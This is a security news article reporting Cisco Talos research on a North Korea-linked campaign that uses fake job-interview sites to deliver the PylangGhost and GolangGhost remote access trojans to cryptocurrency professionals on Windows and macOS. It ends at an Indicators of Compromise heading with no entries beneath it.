Chollima Hackers Target Windows and MacOS with New GolangGhost RAT Malware

A North Korean-affiliated threat actor called Famous Chollima (also known as Wagemole) has launched a sophisticated remote access trojan (RAT) campaign against Windows and MacOS devices, a concerning development discovered by Cisco Talos in May 2025.

This group, suspected to comprise multiple coordinated entities, has introduced a Python-based variant dubbed “PylangGhost” alongside the previously documented Golang-based “GolangGhost” RAT.

While Windows users encounter the Python variant, MacOS systems are targeted with the Golang version, leaving Linux users unaffected in this latest wave of attacks.

North Korean-Aligned Threat Actor

The primary victims appear to be professionals with expertise in cryptocurrency and blockchain technologies, a clear indication of the attackers’ focus on financial gain through stolen credentials and sensitive data.

The Famous Chollima group employs a cunning two-pronged strategy to exploit their targets, as detailed in Cisco Talos’ findings.

Their primary method involves creating fake job interview platforms impersonating reputable companies like Coinbase, Robinhood, Uniswap, and Parallel Studios.

Unsuspecting job seekers, primarily software engineers, marketing professionals, and designers, are lured with personalized invite codes to skill-testing websites built on the React framework.

After entering personal details and answering tailored questions, users are prompted to record a video interview.

This step deceives them into executing a malicious command presented as a necessary driver installation for camera access via PowerShell or Bash, depending on the operating system.

Cryptocurrency and Blockchain Experts in the Crosshairs

For Windows, the command downloads a ZIP file containing PylangGhost modules and a Visual Basic Script to unzip and launch the trojan through a renamed Python interpreter file, “nvidia.py”.

On MacOS, a similar infection chain delivers the GolangGhost variant. This “ClickFix” tactic, part of broader campaigns like Contagious Interview, has been active since mid-2024, exploiting human trust in professional opportunities.

Technically, PylangGhost mirrors GolangGhost in functionality, featuring six structured Python modules for tasks like establishing persistence via registry entries, generating unique system GUIDs, and communicating with command-and-control (C2) servers using RC4-encrypted HTTP packets.

The RAT enables remote system control, file manipulation, and credential theft from over 80 browser extensions, including cryptocurrency wallets like MetaMask and password managers like 1Password.

Open-source intelligence suggests the impact is currently limited, with a small number of affected users predominantly in India, and no Cisco customers impacted per telemetry data.

Despite the different programming languages, the near-identical module structures and naming conventions between PylangGhost and GolangGhost suggest a close-knit development team behind both variants.

Cisco Talos has provided robust detection and mitigation tools, including Secure Endpoint, Secure Email, and Secure Firewall, alongside ClamAV signatures and Snort rules to combat this threat.

Below is a curated list of Indicators of Compromise (IOCs) for reference, including file hashes, C2 server addresses, and deceptive domains used in the campaign.

Organizations, especially in the cryptocurrency sector, are urged to remain vigilant against such socially engineered attacks.

Indicators of Compromise (IOCs)